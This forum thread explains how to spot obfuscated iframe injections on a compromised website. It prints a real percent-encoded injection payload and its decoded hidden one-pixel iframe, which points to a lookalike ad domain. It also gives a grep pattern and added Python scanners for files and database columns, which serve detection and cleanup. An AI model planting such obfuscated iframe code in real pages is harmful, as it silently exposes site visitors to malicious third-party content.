TUTORIAL: Obfuscated iFrame Injection Attacks

  • wpas (Proficient, Posts: 322, Loc: Canada)

Post 3+ Months Ago

INTRODUCTION

Obfuscation is the concealment of meaning in communication, making communication confusing, intentionally ambiguous, and more difficult to interpret. It is basically a form of encryption. The web page is not really encrypted, or else the web page would not display when accessed. The web browser can tell the difference between this encrypted code and regular HTML, but the human eye cannot decipher the encrypted code.

I had a friend who was a victim of these obfuscated iframe injection attacks. When I tested his site, all tests indicated that his site was clean, yet I knew this could not be the case. I checked all his index.* files and could not find any obvious hidden iframes. What I did notice was some code that was obfuscated, which my friend had no explanation for.

Identifying The Obfuscated iFrame

Doing some research, I found that compromised websites can be infected with hidden iframes and/or with obfuscated (escaped) javascript code. My friend's website appeared to be a victim of this obfuscated iframe injection.

The following was the suspected malicious iframe injection obfuscated code:

JAVASCRIPT Code:
<Script Language='Javascript'>
<!--
document.write(unescape('%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D'));
//-->
</Script>


Researching the issue further, I found some websites that were able to deobfuscate, or decrypt, the code. Just Google "Javascript DeObfuscator" to find the sites.

What you do is copy only the obfuscated code as shown below:

Code:
%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D


You then paste the code into the form box they provide and then click on "Deobfuscate".

The following was the resulting malicious iframe injection code:

Code:
<iframe src= http: //goooogleadsence.***/_click=8F9DA width=1 height=1 style= visibility:hidden;position:absolute ></iframe>


Notice the spelling "goooogleadsence". Looks strange, doesn't it? By completely removing the obfuscated (escaped) javascript code, my friend's website was clean and safe again.

CONCLUSION

It is important to remember that not all iframes are bad. Although obfuscation was used to hide the iframe injection, obfuscation can also be used to legitimately hide links such as your download link or your PayPal link. Before you remove a suspected iframe, make sure it is not relevant to your web page. You might want to download a copy of the web page before you do any deleting, just to be sure if you are not certain.

  • joebert (Genius, Posts: 13503, Loc: Florida)

Post 3+ Months Ago

// Edit -- Added -i flag to grep.

Ironically, these obfuscated pieces of code you speak of are easier to spot than just plain code. Whereas with regular code you have to come up with a signature for each exploit, this obfuscated stuff can be found almost universally with something like the following.

BASH Code:
grep -rni '%[0-9a-f]\{2\}%[0-9a-f]\{2\}%[0-9a-f]\{2\}%[0-9a-f]\{2\}%[0-9a-f]\{2\}' ./


That "goooogleadsence" certainly is sneaky. At first glance I thought you'd discovered someone trying to perpetrate Adsense click fraud via an <iframe>. I imagine a lot of website owners are going to see something like that and assume it's their Adsense code and ignore it.
  • wpas (Proficient, Posts: 322, Loc: Canada)

Post 3+ Months Ago

As I had also mentioned, obfuscation can also be used to legitimately hide download links, so you need to be careful before you delete, especially if you are using someone else's script which is not malicious.
  • joebert (Genius, Posts: 13503, Loc: Florida)

Post 3+ Months Ago

Yep. That's why I have the -n flag in my grep, so it will show the file which the code is in as well as the line it is on so I can go check it out.

If I don't have any special considerations, I can set that command up to run daily and with a MAILTO setup the cron job will email me the list of files, line numbers, and code excerpts.

If there are certain files which should have such things in them, I can pipe the output through a program which weeds these false positives out before sending any other items along for MAILTO to email me.
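A scanner in the spirit of the grep above and of the copy-and-deobfuscate steps in the first post, added here as an example and not code from either poster: it finds runs of %XX escapes, decodes them, flags decoded output that builds a hidden or one-pixel iframe, and skips an allowlist of files known to contain legitimate escaped text. The file names, sample page contents and the EXAMPLE.invalid address are constructed.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Same idea as the grep in the thread: a run of at least five consecutive %XX escapes.
ESCAPED_RUN = re.compile(r'(?:%[0-9a-fA-F]{2}){5,}')
HIDDEN_IFRAME = re.compile(  # the iframe the thread describes: invisible, or 1px wide/high
    r'<iframe[^>]*?(?:visibility\s*:\s*hidden|(?:width|height)\s*=\s*["\']?[01]\b)', re.I)

def escape_all(text):
    """Percent-encode every byte, the way the injected payload in the thread is encoded."""
    return ''.join('%%%02X' % b for b in text.encode())

def classify(decoded):
    """'hidden-iframe' if the decoded text builds a hidden/1px iframe, else 'escaped-text'."""
    text = decoded.replace('[', '<').replace(']', '>')  # the forum rendered the tags as [iframe]
    return 'hidden-iframe' if HIDDEN_IFRAME.search(text) else 'escaped-text'

def scan_line(line):
    """Decode every escaped run in one line. Returns [(encoded, decoded, verdict), ...]."""
    runs = [(m.group(0), unquote(m.group(0))) for m in ESCAPED_RUN.finditer(line)]
    return [(enc, dec, classify(dec)) for enc, dec in runs]

def scan_tree(root, allowlist=()):
    """Walk root like `grep -rni` and decode each hit. allowlist names files (relative to
    root) known to hold legitimate escaped text, i.e. joebert's false-positive filter."""
    findings = []  # (relative path, line number, decoded excerpt, verdict)
    for dirpath, _, files in os.walk(root):
        for rel in (os.path.relpath(os.path.join(dirpath, n), root) for n in sorted(files)):
            if rel in allowlist:
                continue
            with open(os.path.join(root, rel), encoding='utf-8', errors='replace') as fh:
                for lineno, line in enumerate(fh, 1):
                    findings += [(rel, lineno, dec[:70], v) for _, dec, v in scan_line(line)]
    return findings

def demo():
    """Constructed web root: an infected index.php beside a legitimate escaped download link."""
    pages = {
        'index.php': "<script>document.write(unescape('%s'));</script>\n" % escape_all(
            '[iframe src= http://EXAMPLE.invalid/x width=1 height=1 style= visibility:hidden ][/iframe]'),
        'dl.js': "var link = unescape('%s');\n" % escape_all('https://example.invalid/download.zip'),
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in pages.items():
            with open(os.path.join(root, name), 'w') as fh:
                fh.write(body)
        return scan_tree(root), scan_tree(root, allowlist=('dl.js',))
```

Piping the output of scan_tree into the cron job's mail, as joebert describes, gives file, line number and the decoded excerpt rather than the raw escapes, so the reviewer can see at once whether a hit is an iframe or a download link.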
  • wpas (Proficient, Posts: 322, Loc: Canada)

Post 3+ Months Ago

thanks for the info
  • joebert (Genius, Posts: 13503, Loc: Florida)

Post 3+ Months Ago

Now I need something that works as simple as grep, but to query database tables with VARCHAR / TEXT / BLOB /etc columns looking for that pattern.

// Edit -- Though, I suppose it would work if I SELECT INTO OUTFILE to backup the database to a non-public directory before the grep executes so it can look there too. But I believe database dumps a lot of times actually use that escaped format for binary data, which could lead to an unmanageable number of false positives. :scratchhead:
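One way to run that same pattern over database columns instead of files, added here as an example rather than anything from the thread: it registers the regex as a SQLite REGEXP function and sweeps every string-typed column of every table, reporting table, rowid and column the way grep's -n reports file and line. The tables, rows and payload are constructed.

```python
import re
import sqlite3

# Same pattern as the grep in the thread: five or more consecutive %XX escapes.
ESCAPED_RUN = r'(?:%[0-9a-fA-F]{2}){5,}'

def _regexp(pattern, value):
    """SQLite REGEXP hook: `col REGEXP pattern` calls this with (pattern, value)."""
    if isinstance(value, bytes):
        value = value.decode('latin-1')      # BLOBs: scan the raw bytes as text
    return value is not None and re.search(pattern, value) is not None

def text_columns(conn, table):
    """Column names whose declared type can hold strings (VARCHAR/TEXT/BLOB/untyped)."""
    cols = conn.execute('PRAGMA table_info("%s")' % table.replace('"', '""')).fetchall()
    return [c[1] for c in cols if not re.search(r'INT|REAL|FLOA|DOUB|NUM|BOOL|DATE', c[2].upper())]

def scan_database(conn):
    """Grep-like sweep: returns [(table, rowid, column, first matched run), ...]."""
    conn.create_function('REGEXP', 2, _regexp)
    q = lambda ident: '"%s"' % ident.replace('"', '""')   # quote identifiers safely
    findings = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for col in text_columns(conn, table):
            sql = 'SELECT rowid, %s FROM %s WHERE %s REGEXP ?' % (q(col), q(table), q(col))
            for rowid, value in conn.execute(sql, (ESCAPED_RUN,)):
                text = value.decode('latin-1') if isinstance(value, bytes) else value
                findings.append((table, rowid, col, re.search(ESCAPED_RUN, text).group(0)[:40]))
    return findings

def escape_all(text):
    """Percent-encode every byte, the way the payload in the thread is encoded."""
    return ''.join('%%%02X' % b for b in text.encode())

def demo():
    """Constructed in-memory database: a CMS posts table plus a settings table with a BLOB."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE posts (id INTEGER PRIMARY KEY, body TEXT)')
    conn.execute('CREATE TABLE settings (name VARCHAR(32), value BLOB)')
    conn.execute('INSERT INTO posts (body) VALUES (?)', ('Hello, clean post.',))
    conn.execute('INSERT INTO posts (body) VALUES (?)',
                 ("<script>document.write(unescape('%s'));</script>" % escape_all('[iframe src=x width=1 height=1][/iframe]'),))
    conn.execute('INSERT INTO settings VALUES (?, ?)', ('logo', bytes(range(256))))
    return scan_database(conn)
```

The same regex works directly as a WHERE clause with MySQL's built-in REGEXP operator, which is the grep-like query the post is after; SQLite just needs the function registered first.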

© 1998-2014. Ozzu® is a registered trademark of Unmelted, LLC.